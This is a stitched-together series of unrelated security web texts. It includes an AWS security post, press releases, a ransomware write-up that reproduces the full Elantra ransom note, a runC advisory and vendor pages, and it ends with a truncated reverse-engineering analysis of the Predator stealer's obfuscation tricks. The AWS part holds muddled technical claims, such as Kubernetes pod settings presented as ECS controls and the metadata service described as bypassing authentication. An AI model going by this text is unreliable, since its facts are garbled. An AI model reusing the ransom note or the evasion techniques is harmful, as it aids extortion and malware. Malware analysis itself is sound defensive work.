Identity and Access Management can ensure that only authorized users can access your cloud account. Likewise, you should make sure that any user inputs are sanitized before they are sent to the cloud. Moreover, you should always implement the least privileges principle when setting up your cloud environment. This principle prevents privilege escalation paths and unwanted actions by limiting the privileges that users have. Another important security measure is to protect your AWS account from outside attacks. This is especially important if your AWS resources are accessible via public APIs. For this reason, you should always implement a secure identity management strategy and implement a secure access management strategy. AWS also provides tools that help you identify who has access to certain resources, monitor access rights, and record user actions for compliance purposes. In addition, different types of threats can be launched against your AWS services, including DDoS attacks. These attacks can cripple your services and compromise your architecture security. AWS recently disclosed a vulnerability or attack on Elastic Container Service, which uses Amazon Linux. While the attack is unlikely to affect the majority of users, it can compromise sensitive data. The vulnerability is exploitable on containers running on any underlying server. The attack is particularly dangerous because it can enable unprivileged processes to escalate privileges and take full control of the underlying server. AWS has issued fixes for these issues and has notified affected customers. One way to protect your ECS cluster from attacks is to create secure container images that have immutable tags. Additionally, you should never run your containers as privileged, as this gives them all of the capabilities of their host. In addition, you should encrypt your container images using a Customer Managed Key service. This service is provided by AWS and is required for the use of Elastic Container Repository. It allows for automated data collection and parallel processing of container data. Another way to secure your ECS clusters is to set up security policies. These policies can limit which tasks are allowed to access sensitive data. These security policies can be configured in pods using the securityContext.allowPrivilegedEscalation parameter. XML evaluation and rendering issues can result in a number of problems. Firstly, they can result in XML errors that can compromise a security feature. Another problem is that the XML processing can be corrupted. This can be an issue in AWS, as it can lead to serious security issues. This vulnerability can lead to the disclosure of sensitive data, a denial of service, or unauthorized access to a system’s resources. This vulnerability may also allow an attacker to upload hostile content to an XML document without the user’s knowledge. SSRF exploitations are web attacks that exploit server metadata and allow malicious actors to access a server’s private IP. The attacker can use this information to modify URLs and send them to a server. This allows the attacker to access sensitive configuration data and compromise a server’s reputation. They can also scan internal networks and identify unsecured services. Moreover, SSRF exploitations are often linked to other attacks, such as reflected XSS and remote code execution. The attack is made possible by exploiting a security flaw in a common application. The server’s URL is sent to the attacker’s browser as a header. Typically, the attacker needs to control the URL and headers to execute malicious code. However, if the attacker has enough access to a server, they can exploit this vulnerability to attack other servers. AWS is offering solutions to mitigate SSRF attacks. One of these solutions is the Instance Metadata Service. This service provides configuration and management capabilities. It also allows instances to be assigned roles to bypass authentication required at startup. In this way, a compromised server can impersonate a targeted service and obtain sensitive data. For example, a shopping application could query a backend API with a product ID and obtain access to sensitive information. Misconfigurations are common occurrences in cloud environments. While they are difficult to prevent, they can be very easy to correct. The first step in preventing them is to make sure your cloud environment is properly configured. Many organizations fail to recognize the importance of this task. AWS uses advanced security measures to protect its customers from misconfigurations, but even so, you should still pay attention to the details to keep your cloud environment as secure as possible. For example, a misconfigured security setting can cause an attack to be launched. This can expose sensitive information. The best way to prevent this is to perform a security design review of your environment and make sure your AWS services are configured correctly. This includes mapping your data flows and using a security questionnaire to determine your attack surface and potential vulnerabilities. In addition, make sure you are not using the default VPC. This can violate APRA, MAS, or NIST standards. You should also make sure your AMI is up-to-date. By doing these steps, you can make sure your EC2 instances are secure and reliable. InsightIDR is a cloud-native, AWS-integrated vulnerability detection and response tool that provides comprehensive and contextualized security data. It helps businesses detect critical threats earlier by allowing them to correlate daily events with assets and users. Its flexible search and log normalization capabilities allow organizations to build custom alerts based on their specific needs. It is available through the AWS Marketplace. InsightIDR collects data from all AWS services and can be set up in a matter of hours. It also provides security teams with visibility across their entire network. This is a tremendous benefit for organizations moving to the cloud. InsightIDR unifies SIEM, endpoint detection, and user behavior analytics. It analyzes billions of events daily to isolate important behaviors and deliver prioritized alerts. It also helps detect stealthy attacks that are missed by traditional security tools. With real-time telemetry and automated workflows, InsightIDR minimizes the time it takes to investigate threats. The Rapid7 InsightOps platform provides a complete picture of your AWS environment through log management. It offers a broad suite of security solutions that integrate with CloudTrail and CloudWatch to monitor your application logs and provide actionable remediation reports. This cloud-based security platform is subscription-based, and licenses are based on the number of assets that need to be monitored. The InsightVM dashboard provides a context for events, making it easier for DevOps teams to prioritize security tasks. The system prioritizes vulnerabilities based on the Real Risk Score. This enables security teams to prioritize security tasks, reducing measurable risk in the AWS environment. Rapid7 is a leading provider of vulnerability management software and security automation. Its advanced technology helps identify and remediate vulnerabilities before they cause a breach. Its cloud-based vulnerability management solution also offers a live threat intelligence feed and asset management. Its web-based interface is user-friendly and provides plenty of support. Please share this post with your friends, family, or business associates who may encounter cybersecurity attacks.
SEATTLE, Nov. 22, 2016 –DomainTools, the leader in domain name and DNS-based cyber threat intelligence, today announced that Tim Helming, director of product management, will present at FireEye’s Cyber Defense Summit in Washington, D.C. During his presentation, “Phishy Words: Internet-Scale Patterns of Word Affixes in Phishing Domains”, Helming will share tips and tricks that will help to identify the spam domains that present the highest risks to organizations, as well as explain how to analyze patterns to gain a better understanding of attackers. The FireEye Cyber Defense Summit 2016 is an annual conference that brings together experts in security technology, threat intelligence, and incident response to address the primary security challenges business and government face today. The event will be held at the Washington Hilton in Washington, D.C. from November 28-30, with Tim Helming presenting on Tuesday, November 29 at 1:10pm ET. From the last quarter of 2015 through the first quarter of 2016, the Anti-Phishing Working Group (APWG) noted a 250 percent increase in the amount of phishing websites. This staggering news demonstrates exactly why phishing is a top security concern among leading decision makers, CISOs, and IT professionals at businesses of all sizes. One of the more popular ways to generate phishing domains is to add certain words, known as affixes, to the domain names of legitimate organizations, in order to make the victims believe they are visiting the legitimate site. Not only will Helming’s presentation demonstrate how to identify malicious affix words that disguise as legitimate domain names, he will share how to analyze various attribute signals to ensure high confidence in domain risk assessment and proactively prevent phishing attacks before they happen. FireEye Cyber Defense Summit 2016 Who: Tim Helming, director of product management, DomainTools What: “Phishy Words: Internet-Scale Patterns of Word Affixes in Phishing Domains” When: Tuesday, November 29, 1:10pm ET Where: Washington Hilton, Washington, D.C. - Identify the words commonly added to the domain names of legitimate organizations (e.g., “login,” “account,” “my-“, etc.) that lead people to believe they are visiting the legitimate site - Analyze the source (geographical hotspot, domain registrar, TLD, etc.) of the “phishy” word additions used in the most common forms of malicious activity (malware, phishing, spam) - Determine which types of word affixes present the highest risk to unsuspecting victims in order to better understand attackers and, in some cases, proactively block new malicious domains For more information on the FireEye Cyber Defense Summit 2016 and to register for the event to attend Tim Helming’s presentation, please visit: http://www.fireeyesummit.com/ DomainTools helps security analysts turn threat data into threat intelligence. We take indicators from your network, including domains and IPs, and connect them with nearly every active domain on the Internet. Those connections inform risk assessments, help profile attackers, guide online fraud investigations, and map cyber activity to attacker infrastructure. Fortune 1000 companies, global government agencies, and leading security solution vendors use the DomainTools platform as a critical ingredient in their threat investigation and mitigation work. Learn more about how to connect the dots on malicious activity at https://www.domaintools.com or follow us on Twitter: @domaintools Barokas PR for DomainTools
The Elantra Ransomware is a threatening new malware that has been detected in the wild. Although the infosec community classifies the threat as being yet another variant from the already established Matrix Ransomware family, that doesn't diminish its destructive capabilities. Elantra will damage any computer it manages to infect severely. The Elantra Ransomware does so by initiating an encryption routine that employs a combination of strong cryptographic algorithms. All files affected by the threat will be rendered inaccessible and unusable. Elantra will change the names of the files it encrypts completely by substituting the original name with a random string of characters followed by an email address under the control of the hackers - '[email protected].' Upon completion of the encryption process, the threat will proceed to deliver its ransom note containing instructions to the victims. The full set of instructions will be placed inside files named '#How_To_Decrypt_Files#.rtf,' while a shorter message will be displayed in an image set as a new desktop background. Elantra Ransomware's victims are told that they will have to pay a ransom in Bitcoin if they want to receive the necessary key and decryption tool from the cybercriminals. The exact amount is not mentioned, but the ransom note states that the size of the ransom will depend on the time it takes victims to initiate contact. To further push affected users into meeting their demands, the hackers threaten that after 72 hours, the decryption key will be deleted from their servers, and all locked data will become unsalvageable. Apart from the email found in the encrypted files' names, the ransom note also provides a reserve address at '[email protected].' Victims are allowed to attach up to three files that do not exceed a total size of 10MB that will be decrypted for free. The message from the wallpaper image used by the Elantra Ransomware is: 'All your personal files were encrypted with RSA-2048 crypto algorithm! Without your personal key and special software data recovery is impossible! If you want to restore your files, please write us to the e-mails: [email protected] OR [email protected] * Additional info you can find in files: #How_To_Decrypt_Files#.rtf' The full set of instructions delivered through the '#How_To_Decrypt_Files#.rtf' files is: 'WHAT HAPPENED WITH YOUR FILES? Your documents, databases, backups, network folders and other important files are encrypted with RSA-2048 and AES-128 ciphers. More information about the RSA and AES can be found here: No data from your computer has been stolen or deleted, but it is impossible to restore files without our help. For decrypyion of your files you need two things: first is your private RSA keys and second is our special software - decryption tool. Sure, you can try to restore your files yourself, but the most part of the third-party software changes data within the encrypted file and causes damage to the files and as result, after using third-party software - it will be impossible to decrypt your files even with our software. If you want to restore your files, you have to pay for decryption in Bitcoins. The price depends on how fast you write to us. Contact us using this e-mail address: [email protected] In subjеct linе оf the mеssаgе writе yоur pеrsоnаl ID: - This e-mail will be as confirmation you are ready to pay for decryption key. After the payment you will get the decryption tool with instructions that will decrypt all your files including network folders. ATTENTION!!! After 72 hours your unique RSA private key will be automatically deleted from our servers permanently in interest оf оur security, and future decryption of your data will become impossible. If you don't believe in our service and you want to see a proof, you can ask for a test decryption. About the test decryption: You can send us up to 3 encrypted files. The total size of the files must be less than 10Mb (non archived), and files should not contain valuable information (databases, backups, large excel sheets, etc.). We will decrypt and send you decrypted files back. In a case of no answer in 24 hours, usе thе rеsеrvе е-mаil аddrеss: [email protected] * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * It doesn't make sense to complain of us and to arrange a hysterics. * Complaints having blocked e-mail, you deprive a possibility of the others, to decipher the computers. * Other people at whom computers are also ciphered you deprive of the ONLY hope to decipher. FOREVER.'
Despite the huge advantages that containers offer in application portability, acceleration of CI/CD pipelines and agility of deployment environments, the biggest concern has always been about isolation. Since all the containers running on a host share the same underlying kernel, any malicious code breaking out of a container can compromise the entire host, and hence all the applications running on the host and potentially in the cluster. That fear of container isolation failing to hold up turned out to be true yesterday when a vulnerability in runC was announced. runC is the key and most popular software component that most container engines rely on for spinning up containers on a host. The announced vulnerability allows an attacker to break out of the container isolation through a well-crafted attack (technical details of the vulnerability and the exploit are at https://seclists.org/oss-sec/2019/q1/119) and compromise the entire host. The vulnerability is particularly nasty because it is not covered by the default AppArmor or SELinux kernel-enforced sandboxing policies. What can you do to protect your containerized applications? Even though the exploit is tricky to execute, the exploit code will be released publicly on February 18, so it’s best to protect your container environment by doing the following: - Know which nodes (Docker hosts) you are running the containers, and if you are running a vulnerable version of Docker Engine. If you are a Qualys customer, you can use AssetView to get that information. Docker has released the patch in version 18.09.2. - Upgrade your Docker hosts to version 18.09.2. - For hosts managed by public cloud service providers, please keep a close watch on how they are addressing the issue. GCP – https://cloud.google.com/kubernetes-engine/docs/security-bulletins AWS – https://aws.amazon.com/security/security-bulletins/AWS-2019-002/ - Qualys is working on releasing the following detections (QIDs), and more vendor-specific QIDs will be launched in the coming days. 237121 : Red Hat Update for docker (RHSA-2019:0304) 237120 : Red Hat Update for runc (RHSA-2019:0303) 351500 : Amazon Linux Security Advisory for docker: ALAS-2019-1156 371641 : Runc Container Breakout Vulnerability You can get more details at Qualys Threat Protection. What to do in the future? It’s good to be concerned about any new technology while it matures, but it’s equally important to harden the application build and deployment workflows in order to prevent the attacker from getting an easy lead into exploiting the deployed containers. - Ensure that only those container images that have gone through the defined compliance checks (related to vulnerabilities, packages, etc.) are deployed in production. As an example, you can use the Qualys Container Security solution to promote only those built images that pass the compliance checks on the build nodes. - Privileged containers, if compromised, can bring down the entire container cluster. Hence, keep a close watch on all privileged containers running in your environment. (Asif Awan is CTO for Container Security at Qualys)
The logging API is designed to allow C applications to produce messages of interest and write them to the Access Manager logs. When some type of event occurs in an external application, the application code first determines if the logging module (a file created for messages usually relevant to a specific function or feature) to which the event is relevant has a level high enough to log the event. (A level specifies importance and defines the amount of detail that will be logged.) If the determination is affirmative, a log message is generated and a log record created in the relevant logging module. Information in the log record can be updated as necessary. The following notes regard the logging API for C functionality: The am_log_init() function by the application must be called before using any other am_log_* interfaces. If either the SSO, authentication, or policy initialization functions (am_sso_init(), am_auth_init(), or am_policy_init()) are called, am_log_init() does not need to be called as each of the three aforementioned functions call am_log_init() internally. The am_log_record_* interfaces can be used to set or update information in the log record. They include: The following are convenience functions that provide simplified access to existing log records. They include:
Skip to Main Content Network intrusion detection aims at distinguishing the attacks on the Internet from normal use of the Internet. This is a typical problem of the classification, so intrusion detection (ID) can be seen as a pattern recognition problem. In this paper, In this paper, we build the intrusion detection system using Adaboost, a prevailing machine learning algorithm, construction detection classification. In the algorithm, decision RBF neural network are used as weak classifiers. For the training sets is multi-attribute, non-linear and massive, we use pattern recognition method of non-linear data dimension reduction algorithm-Isomap algorithm to feature extraction and to improve the speed and training for the handling of classified speed. In the feature extraction after the feature of the dimension and Adaboost algorithm training rounds, were studied and experimented. Finally,the experiment proved that Isomap and Adaboost combination of testing the effectiveness of the mothod.
Overview of HTTP Status Codes for Software Testers HTTP status codes are three-digit numbers that define the present status of a client's request to a server. These codes are returned by the server as a response to a client's HTTP request. HTTP status codes indicate whether the request was successful, failed, or redirected to another resource. A request is made to the server (where the website is being hosted) each time a Uniform Resource Locator (URL) is entered into the client browser. In other words, the client sends a Hypertext Transfer Protocol (HTTP) request to the server, and the server replies by returning an HTTP status code to the client, indicating whether the request was successful or not. The server answers when you submit the request via the HTTP protocol.
This article was originally written by Robert Reichel for the GitHub blog. To see the original article in its entirety, click HERE. One of the most effective tools for DevOps teams looking to increase the security of their applications is threat modeling. Threat modeling involves bringing security and engineering teams together to discuss systems and generate action items that improve the security of the system. Here at GitHub, threat modeling has helped us improve communication between our security and engineering teams, has made the security review process more proactive, and has led to more reliable and more secure system designs. The creation of a threat model is a collaborative security exercise where we evaluate and validate the design and task planning for a new or existing service. This exercise involves structured thinking about potential security vulnerabilities that could adversely affect a service. Every threat modeling conversation should have at least the following goals: - Ensuring everyone understands how the system works. - Evaluating the surface area and developing the most likely points of compromise. - Developing mitigation strategies to be implemented for each point of compromise. The simple act of sitting down and discussing the system holistically provides a great opportunity for everyone to discuss the underlying system. Knowledge sharing between the teams helps everyone grow in their knowledge of the systems in the environment. This also contributed to the development of vulnerability mitigation strategies for issues discovered during the threat model review, which improved the security posture of the entire organization. Government agencies looking to embrace threat modeling within their own organizations may not know where to start. So, here the process that we follow at GitHub, which has delivered system-wide security improvements, proactive design guidance, and improved communication between security and engineering teams: Decide when to threat model At GitHub, we typically do threat modeling on a set cadence with each of the feature teams, and before the release of any new features that make major changes to the architecture. Depending on the amount of engineering taking place on a feature, you may need a faster cadence (every couple of months) or a slower one (once per year). If you have an existing cadence of software review, we’ve found that integrating it with those existing processes helps everyone to adapt to adding a new security process. Regardless of your timing, set guidelines, and be flexible. Build the threat model Threat modeling is usually a collaborative exercise, so the engineering team for the product and the security team will get together to talk through the architecture and potential security concerns. Ahead of time, our security team will provide documentation and examples to the engineering teams on effective threat modeling. We typically ask each engineering team to generate a model in advance, covering a significant part of a system to review as part of a single threat modeling conversation. Setting these expectations early (and doing the homework) helps to ensure that the meeting is effective. Though the process and discussions are what matter more than the specific output, at GitHub, we ask the engineering team to bring a threat model developed either in Microsoft’s Threat Modeling Tool or OWASP’s Threat Dragon (both are entirely free). These tools enable the teams to clearly present important information for the threat model such as APIs, trust boundaries, dependencies, datastores, authentication mechanisms, etc. In addition to providing some consistency between teams, these files will also act as important collateral to share with any auditors if you need to meet various security compliance requirements. Review the threat model When it’s time to review the threat model, we typically schedule a one-hour session, broken into two parts. The first five to 10 minutes of every session is spent with the engineering team understanding the design of the system that is being reviewed. This time ensures that everyone is on the same page and helps clarify any ambiguities from the previously prepared threat mode—including which technologies are being used and any design quirks. After everyone is aligned, we can jump right into the security discussion. At this point in the security discussion, we’ve found it helpful to use a framework to methodically address different vulnerability classes. One of the methodologies we frequently use is Microsoft’s STRIDE model—Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Escalation of Privilege—a mnemonic covering common attack vectors which may be found in an application. Stepping through these classes while looking at the overarching system enables the security teams to holistically look at a system being analyzed and ensure that they cover the most likely threats. Following STRIDE fills the remainder of the hour as conversation expands and more parts of the system get unpacked. As potential security vulnerabilities or design flaws are found, the security team takes note of them as well as potential remediations. This is so we can generate a list of potential changes for the engineering team to consider making after the session. We found that as threat modeling became more common across GitHub, teams learned to engage the security team while developing the system—which is better, as it fostered getting ahead of potential issues and addressing major architectural changes before hands hit keyboards. This in turn helped the security teams deploy better defense in depth through secure design principles. As the session draws to an end, we recount the key findings and improvements that the teams should make and generate tracking items for those. A summary is distributed to the participants where anyone is free to ask follow up questions to better flesh out the action items. Threat modeling is an incredible way for government DevOps teams to identify vulnerabilities in their applications and make them more secure. GitHub’s methodology for threat modeling has had generated incredible results for the company – enabling the development of vulnerability mitigation strategies, guiding engineering teams from system designs that might present future vulnerabilities and building connections between the engineering and security teams that make it easier to reach out— in both directions.
I know how Hyperloglog works but I want to understand in which real-world situations does it really apply i.e. makes sense to use Hyperloglog and why? If you've used in solving any real-world problems, please share. What I am looking for is, given the Hyperloglog's standard error, in which real-world applications is it really used today and why does it work? ("Applications for cardinality estimation", too broad? I would like to add this simply as a comment but it won't fit). I would suggest you turn to the numerous academic research of the subject; usually academic papers contain some information of "prior research on the subject" as well as "applications for which the subject has been used". You could start with traversing the references of interest as referenced by the following article: - HyperLogLog: the analysis of a near-optimal cardinality estimation algorithm, by P. Flageolet et al. ... This problem has received a great deal of attention over the past two decades, finding an ever growing number of applications in networking and traffic monitoring, such as the detection of worm propagation, of network attacks (e.g., by Denial of Service), and of link-based spam on the web . For instance, a data stream over a network consists of a sequence of packets, each packet having a header, which contains a pair (source–destination) of addresses, followed by a body of specific data; the number of distinct header pairs (the cardinality of the multiset) in various time slices is an important indication for detecting attacks and monitoring traffic, as it records the number of distinct active flows. Indeed, worms and viruses typically propagate by opening a large number of different connections, and though they may well pass unnoticed amongst a huge traffic, their activity becomes exposed once cardinalities are measured (see the lucid exposition by Estan and Varghese in ). Other applications of cardinality estimators include data mining of massive data sets of sorts—natural language texts [4, 5], biological data [17, 18], very large structured databases, or the internet graph, where the authors of report computational gains by a factor of 500+ attained by probabilistic cardinality estimators. At my work, HyperLogLog is used to estimate the number of unique users or unique devices hitting different code paths in online services. For example, how many users are affected by each type of service error? How many users use each feature? There are MANY interesting questions HyperLogLog allows us to answer.
Cybersecurity is becoming more and more important to our lives every day, and its role in modern healthcare is just one example of that importance. All of the terms related to cybersecurity can make learning more about it seem intimidating, but Xconomy has developed a helpful solution. On April 29, the site released a glossary of terms related to cybersecurity, defining everything from “advanced persistent threat” to “zero-day attack.” Did you know that a “worm” is “a type of malware that is standalone (unlike a virus, which is attached to another program) and spreads to other machines by replicating itself”? If not, you will know it after reading through this glossary! Click below for the story, courtesy of Xconomy.
This section contains links to common root SSL certificates used in The Things Stack, issued by trusted certificate authorities (CAs). Which Certificate Is Right For My Deployment? The complete certificate list contains all CA certificates trusted by modern browsers, so if you use certificates issued by a popular CA, you should be covered by this one. The minimal certificate list contains a tailored list of certificates used in standard The Things Stack deployments for devices which do not support the larger list due to memory constraints. Unfortunately, some gateways do not support concatenated certificate lists at all. If your device will not connect using the complete or minimal certificate lists, you must use the specific certificate you use to configure TLS for your domain. If you use Let’s Encrypt, use the Let’s Encrypt ISRG Root X1. Complete Certificate List .pem file contains all common CA certificates trusted by Mozilla, and is extracted and hosted by curl. Download the complete certificate list from curl here. Minimal Certificate List for Common Installations .pem file contains certificates used in standard The Things Stack deployments, and is small enough to fit on memory constrained devices such as Gateways. This list includes the following CA certificates: - ISRG Root X1 - Baltimore CyberTrust Root - Amazon Root CA 1, 2, 3 and 4 - The Things Industries Root CA Download the minimal certificate list here. ISRG Root X1 Many The Things Stack deployments use the Let’s Encrypt ISRG Root X1 Trust. If using Let’s Encrypt to secure your domain, you may download the ISRG Root X1 Trust file here.
Threat Modelling as a Preventive approach Threat Modelling has built a strong position in the cybersecurity industry as a well-known practice providing a deeper understanding of the various threats and an overall attack surface. By applying threat modelling to a cloud environment, organizations can understand their cloud architecture, the relevant threats and the overall attack surface. This enables, security teams to better understand the controls required to mitigate these threats and manage their overall risk exposure. This white paper will highlight the most important steps for building a threat model for a cloud environment and establishing a scalable threat modelling process.
Host-Based Penetration Testing With our host-based penetration testing services, NetSPI performs a deep dive review of baseline workstation and server images used to deploy systems to the corporate environment. Improve security with host-based penetration testing by NetSPI Standard network penetration testing engagements may not provide comprehensive insights into the vulnerabilities that exist in your baseline system images and Citrix deployed desktops. During host-based penetration tests, NetSPI performs a deep dive review of baseline workstation and server images used to deploy systems to the corporate environment. The service includes testing of system drive encryption, group policy configurations, patch levels, service configurations, user and group roles, 3rd party software configurations, and more. It also includes a review of the systems and applications for common and known vulnerabilities. NetSPI supports host-based penetration testing of most Windows, Linux, z/OS, and MacOS variations. Also, testing can be conducted against physical hardware, virtual machines, or virtual desktops. The NetSPI Difference NetSPI delivers industry-leading penetration testing expertise and a vulnerability management platform that makes penetration test results actionable. Learn More arrow_forward A collaborative team with experience and expertise produces the highest quality of work Types of Host-Based Penetration Testing Services Host-Based Penetration Testing During host-based penetration tests, NetSPI will conduct an assessment to evaluate the security of a standard system image. Testing is intended to identify vulnerabilities that have the potential to provide unauthorized access to systems, applications, and sensitive data. NetSPI supports host-based pentesting of most Windows, Linux, z/OS, and MacOS variations. Testing may include the review of physical security controls, software security controls, user and group configurations, local access control configurations, local system configurations, local patch configurations, clear text storage of passwords, and clear text storage of sensitive data. Virtual Desktop Penetration Testing As the number of remote workers increases it’s become more challenging to manage physical workstations. As a result, many companies provide remote desktop access through virtualization platforms like Citrix and VMware. Those platforms can make it easy for remote employees, partners, and vendors to access what they need without as much overhead cost and management. However, with the ease of access comes additional risks that don’t have to be considered for laptops not typically accessible from the internet. During Virtual Desktop Penetration Tests, NetSPI will identify vulnerabilities that provide unauthorized access to the operating system through desktops published via virtualization platforms like Citrix and VMware. Additionally, NetSPI will review the system configuration to identify vulnerabilities that could be used to escalate privileges, pivot into the internal environment, or exfiltrate sensitive data. Virtual Application Penetration Testing and Breakout Assessments It has become common for companies to make their traditional desktop applications accessible from the internet by publishing them through virtualization platforms like Citrix or VMware. Those platforms make it easy for remote employees, partners, and vendors to access existing desktop applications without requiring the large investment that comes with rewriting legacy apps for the web. However, with the ease of access comes additional risks that don’t have to be considered for desktop applications living behind a firewall. During Virtual Application Penetration Tests, NetSPI will identify the risks specific to applications published through virtualization platforms along with traditional application testing to help ensure that your company is staying safe while trying to adapt to evolving business needs. During Virtual Application Breakout Assessments, NetSPI will identify vulnerabilities that provide unauthorized access to the operating system through applications published via virtualization platforms like Citrix and VMware. Benefits of Penetration Testing Pentest your applications to: Meet network security testing requirements from a third party Learn how to strengthen your network security program Augment your team Get a fresh set of eyes from penetration testing experts
In today’s digital world, the implications of fake IDs extend beyond physical documents used to misrepresent one's identity. With the rise of online activities and transactions, fake IDs have become a significant component in various cybersecurity threats. This article explores the role of fake IDs in the context of cybersecurity, outlining the challenges they pose and the strategies needed to mitigate these risks. Facilitating Online Identity Fraud One of the primary roles of fake IDs in cybersecurity threats is facilitating online identity fraud. Cybercriminals use fake IDs to create bogus online accounts, apply for loans, or carry out transactions under a false identity. This not only affects individuals whose identities are stolen but also businesses and financial institutions that become victims of fraud. Impact on Data Security and Privacy Fake IDs can be used to bypass security measures in place to protect data privacy. By assuming a legitimate identity, attackers can gain unauthorized access to personal and corporate data. This can lead to data breaches, exposing sensitive information such as financial details, personal records, and confidential business information. Challenges in Authentication and Verification The presence of fake IDs in the digital realm poses significant challenges to online authentication and verification processes. Traditional verification methods may not be sufficient to detect counterfeit identities, necessitating more robust and sophisticated authentication mechanisms. The challenge is to implement these mechanisms without overly complicating legitimate user access or infringing on privacy. Use in Phishing and Social Engineering Attacks Fake IDs contribute to the effectiveness of phishing and social engineering attacks. Cybercriminals often use fake identities to build trust and deceive individuals or employees into divulging confidential information or granting access to restricted systems. This underscores the need for heightened awareness and education about these types of cybersecurity threats. Deepfakes and AI-Generated Fake IDs Advancements in AI have led to the creation of deepfakes – highly realistic and convincing digital representations of real people. These technologies can be used to generate fake IDs that are incredibly difficult to distinguish from real ones, posing new challenges to identity verification in both physical and digital domains. Strategies for Mitigation To combat the role of fake IDs in cybersecurity threats, a multi-layered approach is necessary: Enhanced Verification Methods: Implementing advanced verification methods, such as biometric authentication and multi-factor authentication, can help in accurately identifying fake IDs. Continuous Monitoring: Regular monitoring of online transactions and activities can help in quickly identifying and responding to suspicious activities linked to fake IDs. Public Awareness and Training: Educating the public and employees about the risks associated with fake IDs and common tactics used by cybercriminals is essential in preventing successful attacks. Collaboration and Information Sharing: Collaboration between businesses, cybersecurity experts, and law enforcement can facilitate the sharing of information about emerging threats and counterfeit ID techniques. The role of fake IDs in modern cybersecurity threats is a complex issue that requires vigilant attention and proactive measures. As technology continues to advance, the strategies to detect and mitigate these threats must evolve correspondingly. By understanding the risks and implementing effective strategies, it is possible to reduce the impact of fake IDs on cybersecurity and protect both individuals and organizations from these evolving threats. This website collects information from the Internet. If there is any copyright infringement, please inform this website immediately. This website will promptly delete it and express our deepest apology.
Access rights are consistently enforced across access protocols on all security models. A user is granted or denied the same rights to a file whether using SMB or NFS. Clusters running OneFS support a set of global policy settings that enable you to customize the default access control list (ACL) and UNIX permissions settings. OneFS is configured with standard UNIX permissions on the file tree. Through Windows Explorer or OneFS administrative tools, you can give any file or directory an ACL. In addition to Windows domain users and groups, ACLs in OneFS can include local, NIS, and LDAP users and groups. After a file is given an ACL, the mode bits are no longer enforced and exist only as an estimate of the effective permissions.
Whenever I reverse a sample, I am mostly interested in how it was developed, even if in the end the techniques employed are generally the same, I am always curious about what was the way to achieve a task, or just simply understand the code philosophy of a piece of code. It is a very nice way to spot different trending and discovering (sometimes) new tricks that you never know it was possible to do. This is one of the main reasons, I love digging mostly into stealers/clippers for their accessibility for being reversed, and enjoying malware analysis as a kind of game (unless some exceptions like Nymaim that is literally hell). It’s been 1 year and a half now that I start looking into “Predator The Thief”, and this malware has evolved over time in terms of content added and code structure. This impression could be totally different from others in terms of stealing tasks performed, but based on my first in-depth analysis,, the code has changed too much and it was necessary to make another post on it. This one will focus on some major aspects of the 3.3.2 version, but will not explain everything (because some details have already been mentioned in other papers, some subjects are known). Also, times to times I will add some extra commentary about malware analysis in general. When you open an unpacked binary in IDA or other disassembler software like GHIDRA, there is an amount of code that is not interpreted correctly which leads to rubbish code, the incapacity to construct instructions or showing some graph. Behind this, it’s obvious that an anti-disassembly trick is used. The technique exploited here is known and used in the wild by other malware, it requires just a few opcodes to process and leads at the end at the creation of a false branch. In this case, it begins with a simple xor instruction that focuses on configuring the zero flag and forcing the JZ jump condition to work no matter what, so, at this stage, it’s understandable that something suspicious is in progress. Then the MOV opcode (0xB8) next to the jump is a 5 bytes instruction and disturbing the disassembler to consider that this instruction is the right one to interpret beside that the correct opcode is inside this one, and in the end, by choosing this wrong path malicious tasks are hidden. Of course, fixing this issue is simple, and required just a few seconds. For example with IDA, you need to undefine the MOV instruction by pressing the keyboard shortcut “U”, to produce this pattern. Then skip the 0xB8 opcode, and pushing on “C” at the 0xE8 position, to configure the disassembler to interpret instruction at this point. Replacing the 0xB8 opcode by 0x90. with a hexadecimal editor, will fix the issue. Opening again the patched PE, you will see that IDA is now able to even show the graph mode. After patching it, there are still some parts that can’t be correctly parsed by the disassembler, but after reading some of the code locations, some of them are correct, so if you want to create a function, you can select the “loc” section then pushed on “P” to create a sub-function, of course, this action could lead to some irreversible thing if you are not sure about your actions and end to restart again the whole process to remove a the ant-disassembly tricks, so this action must be done only at last resort. Whenever you are analyzing Predator, you know that you will have to deal with some obfuscation tricks almost everywhere just for slowing down your code analysis. Of course, they are not complicated to assimilate, but as always, simple tricks used at their finest could turn a simple fun afternoon to literally “welcome to Dark Souls”. The concept was already there in the first in-depth analysis of this malware, and the idea remains over and over with further updates on it. The only differences are easy to guess : - More layers of obfuscation have been added - Techniques already used are just adjusted. - More dose of randomness As a reversing point of view, I am considering this part as one the main thing to recognized this stealer, even if of course, you can add network communication and C&C pattern as other ways for identifying it, inspecting the code is one way to clarify doubts (and I understand that this statement is for sure not working for every malware), but the idea is that nowadays it’s incredibly easy to make mistakes by being dupe by rules or tags on sandboxes, due to similarities based on code-sharing, or just literally creating false flag. Already there in a previous analysis, recreating the GetProcAddress is a popular trick to hide an API call behind a simple register call. Over the updates, the main idea is still there but the main procedures have been modified, reworked or slightly optimized. First of all, we recognized easily the PEB retrieved by spotting fs[0x30] behind some extra instructions. then from it, the loader data section is requested for two things: - Getting the InLoadOrderModuleList pointer - Getting the InMemoryOrderModuleList pointer For those who are unfamiliar by this, basically, the PEB_LDR_DATA is a structure is where is stored all the information related to the loaded modules of the process. Then, a loop is performing a basic search on every entry of the module list but in “memory order” on the loader data, by retrieving the module name, generating a hash of it and when it’s done, it is compared with a hardcoded obfuscated hash of the kernel32 module and obviously, if it matches, the module base address is saved, if it’s not, the process is repeated again and again. Nowadays, using hashes for a function name or module name is something that you can see in many other malware, purposes are multiple and this is one of the ways to hide some actions. An example of this code behavior could be found easily on the internet and as I said above, this one is popular and already used. GetProcAddress / GetLoadLibrary Always followed by GetModuleAddress, the code for recreating GetProcAddress is by far the same architecture model than the v2, in term of the concept used. If the function is forwarded, it will basically perform a recursive call of itself by getting the forward address, checking if the library is loaded then call GetProcAddress again with new values. It’s almost unnecessary to talk about it, but as in-depth analysis, if you have never read the other article before, it’s always worth to say some words on the subject (as a reminder). The XOR encryption is a common cipher that required a rudimentary implementation for being effective : - Only one operator is used (XOR) - it’s not consuming resources. - It could be used as a component of other ciphers This one is extremely popular in malware and the goal is not really to produce strong encryption because it’s ridiculously easy to break most of the time, they are used for hiding information or keywords that could be triggering alerts, rules… - Communication between host & server - Hiding strings - Or… simply used as an absurd step for obfuscating the code A typical example in Predator could be seeing huge 